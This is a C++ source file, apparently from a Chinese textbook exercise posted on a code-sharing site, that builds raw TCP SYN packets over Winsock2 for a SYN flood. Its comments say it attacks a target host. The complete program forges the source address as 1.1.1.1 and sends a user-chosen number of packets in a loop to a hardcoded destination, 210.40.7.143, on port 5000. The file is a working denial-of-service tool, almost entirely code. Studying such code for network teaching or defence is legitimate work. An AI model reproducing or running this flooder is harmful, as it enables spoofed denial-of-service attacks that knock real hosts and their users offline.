www.pudn.com > SYNFlood_WINSOCK.rar > SYNFlood_WINSOCK.cpp
/* *程序11. *程序名:SYNFlood_WINSOCK.CPP *本程序通过使用Winsock2原始套接字提供函数sendto(),手动构造TCP SYN帧,对目标主机进行SYN Flood攻击 */ #include#include #include #include #include #pragma comment(lib,"ws2_32.lib") //#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1) #define SEQ 0x12121212 //IPv4包头结构体 typedef struct ip_header { unsigned char ver_ihl; //Version (4 bits) + Internet header length (4 bits) unsigned char tos; //Type of service unsigned short tlen; //Total length unsigned short identification; //Identification unsigned short flags_fo; //Flags (3 bits) + Fragment offset (13 bits) unsigned char ttl; //Time to live unsigned char proto; //Protocol unsigned short crc; //Header checksum unsigned long ip_src; //Source address unsigned long ip_dst; //Destination address }IPHEADER,*PIPHEADER; //TCP包头结构体 typedef struct tcp_header { WORD SourPort; //源端口号 WORD DestPort; //目的端口号 DWORD SeqNo; //序号 DWORD AckNo; //确认序号 BYTE HLen; //首部长度(保留位) BYTE Flag; //标识(保留位) WORD Window; //窗口大小 WORD ChkSum; //校验和 WORD UrgPtr; //紧急指针 }TCPHEADER,*PTCPHEADER; //定义TCP伪首部 注意:TCP与UDP有相同的伪头部结构 typedef struct _psdhdr{ unsigned int saddr; //源地址 unsigned int daddr; //目的地址 CHAR mbz; CHAR ptcl; //协议类型 USHORT tcpl; //TCP长度 }PSDHEADER,*PPSDHEADER; //全局变量 SOCKET m_Socket; //struct addrinfo *dest; SOCKADDR_IN dest; int destport=5000; int srcport=10000; u_char tmpBuf[52]; int optval=1; int number; void InitWinsock2(); //初始化Winsock2 void CreateWinsock(); //创建套接字并设定IP数据报格式 void InitPackageHeader();//初始化各层包头 USHORT checksum(USHORT *buffer, int size); //计算校验和 void SendPackage(); int main(int argc, char* argv[]){ //void main() { printf("Please enter the number of send packet:\n"); scanf("%d",&number); InitWinsock2(); CreateWinsock(); InitPackageHeader(); SendPackage(); closesocket(m_Socket); WSACleanup(); return 0; } //初始化Winsock2 void InitWinsock2() { WSADATA wsaData; WORD version; int ret; version=MAKEWORD(2,2); ret=WSAStartup(version,&wsaData); if(ret!=0) { printf("Failed to load winsock2 library.\n"); return; } } void CreateWinsock() { //创建TCP套接字 m_Socket=socket(AF_INET,SOCK_RAW,IPPROTO_IP); if(m_Socket<0) { printf("Socket Error\n"); return; } //设置头包含选项 int re=setsockopt(m_Socket,IPPROTO_IP,IP_HDRINCL,(char*)&optval,sizeof(optval)); if(re==SOCKET_ERROR) { printf("ERROR!\n"); return; } } void InitPackageHeader() { IPHEADER ip_header; TCPHEADER tcp_header; PSDHEADER psd_header; int ipsz,tcpsz,psdsz,itsz,ptsz; ipsz=sizeof(IPHEADER); tcpsz=sizeof(TCPHEADER); psdsz=sizeof(PSDHEADER); ptsz=psdsz+tcpsz; itsz=ipsz+tcpsz; //初始化IP头部 ip_header.ver_ihl=(4<<4|sizeof(ip_header)/sizeof(ULONG)); ip_header.tlen=htons(sizeof(ip_header)+sizeof(TCPHEADER)); ip_header.identification=1; ip_header.flags_fo=0; ip_header.ttl=128; ip_header.proto=IPPROTO_TCP; ip_header.crc=0; ip_header.ip_src=inet_addr("1.1.1.1"); ip_header.ip_dst=inet_addr("210.40.7.143"); //初始化TCP头部 tcp_header.SourPort=htons(srcport); tcp_header.DestPort=htons(destport); tcp_header.SeqNo=htonl(SEQ); tcp_header.AckNo=0; tcp_header.HLen=(sizeof(TCPHEADER)/4<<4|0); tcp_header.Flag=2; tcp_header.UrgPtr=0; tcp_header.ChkSum=0; tcp_header.Window=htons(16384); //初始化TCP伪头部 psd_header.saddr=ip_header.ip_src; psd_header.daddr=ip_header.ip_dst; psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP; psd_header.tcpl=htons(sizeof(TCPHEADER)); // tmpBuf=(u_char*)malloc(40*sizeof(u_char)); memcpy(tmpBuf,&psd_header,psdsz); memcpy(tmpBuf+psdsz,&tcp_header,tcpsz); tcp_header.ChkSum=checksum((USHORT*)tmpBuf,ptsz); memset(tmpBuf,0,ptsz); memcpy(tmpBuf,&ip_header,ipsz); ip_header.crc=checksum((USHORT*)tmpBuf,ipsz); memcpy(tmpBuf,&ip_header,ipsz); memcpy(tmpBuf+ipsz,&tcp_header,tcpsz); } //计算校验和 inline USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } void SendPackage() { int count=0,re; dest.sin_family=AF_INET; dest.sin_port=htons(destport); dest.sin_addr.s_addr=inet_addr("210.40.7.143"); while(count<=number) { re=sendto(m_Socket,(char*)tmpBuf,52,0,(SOCKADDR*)&dest,sizeof(dest)); if(re==SOCKET_ERROR) { break; } count++; } }